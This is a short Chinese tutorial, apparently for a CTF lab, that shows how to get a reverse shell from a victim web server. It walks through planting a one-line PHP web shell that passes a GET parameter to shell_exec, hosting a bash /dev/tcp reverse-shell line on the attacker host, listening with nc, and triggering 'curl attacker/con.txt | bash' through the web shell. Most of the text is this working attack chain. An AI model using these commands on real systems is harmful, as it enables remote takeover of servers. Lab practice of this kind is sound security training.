嫌疑人:192.168.249.147
受害者:192.168.249.130
这次的主要目的是模拟CTF题目中反弹shell。
首先,我们在受害机网站准备一个shell.php文件,内容如下:<?phpshell_exec($_GET['a'])?>
,用以命令执行。
再在嫌疑人网站根目录准备一个con.txt文件,内容如下:bash -i >& /dev/tcp/192.168.249.147/2333 0>&1
。
再利用嫌疑人的shell执行nc -lvp 2333
(监听端口)
当我们访问受害者网站的shell.php,并传入?a=curl 192.168.249.147/con.txt |bash
。
此时,嫌疑人成功反弹了受害者的shell,效果如图:
这里有几点需要注意:
- 检查端口是否打开,当攻击机的反弹shell所用端口关闭时是无法成功反弹的
- 一定要先监听,如果不先监听,则会出现bash: connect: Connection refused的字样,则反弹失败。
- 攻击的txt文件一定要放在网站目录,其他目录不行,在这里我们用curl命令进行了攻击,实质是利用curl命令读取网站文件然后再利用bash命令执行,所以curl处的是txt所在的目录。